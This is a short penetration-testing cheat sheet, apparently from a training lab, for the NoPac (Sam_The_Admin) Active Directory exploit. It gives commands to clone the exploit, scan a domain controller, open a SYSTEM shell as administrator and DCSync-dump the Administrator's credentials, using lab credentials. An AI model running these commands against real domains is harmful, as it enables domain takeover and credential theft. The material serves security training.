NoPac
NoPac is a privilege escalation vulnerability affecting Active Directory environments, allowing attackers to impersonate privileged accounts and execute malicious actions.
1. Clone NoPac Exploit Repository
Command:
sudo git clone https://github.com/Ridter/noPac.git
Description: Used to clone the NoPac exploit repository using Git. Performed from a Linux-based host.
2. Scan for NoPac Vulnerability
Command:
sudo python3 scanner.py inlanefreight.local/forend:Klmcargo2 -dc-ip 172.16.5.5 -use-ldap
Description: Runs scanner.py to check if a target system is vulnerable to NoPac/Sam_The_Admin from a Linux-based host.
3. Exploit NoPac to Gain SYSTEM Shell
Command:
sudo python3 noPac.py INLANEFREIGHT.LOCAL/forend:Klmcargo2 -dc-ip 172.16.5.5 -dc-host ACADEMY-EA-DC01 --shell --impersonate administrator -use-ldap
Description: Used to exploit the NoPac/Sam_The_Admin vulnerability and gain a SYSTEM shell (--shell). Performed from a Linux-based host.
4. Exploit NoPac for DCSync Attack
Command:
sudo python3 noPac.py INLANEFREIGHT.LOCAL/forend:Klmcargo2 -dc-ip 172.16.5.5 -dc-host ACADEMY-EA-DC01 --impersonate administrator -use-ldap -dump --just-dc-user INLANEFREIGHT/administrator
Description: Used to exploit the NoPac/Sam_The_Admin vulnerability and perform a DCSync attack against the built-in Administrator account on a Domain Controller from a Linux-based host.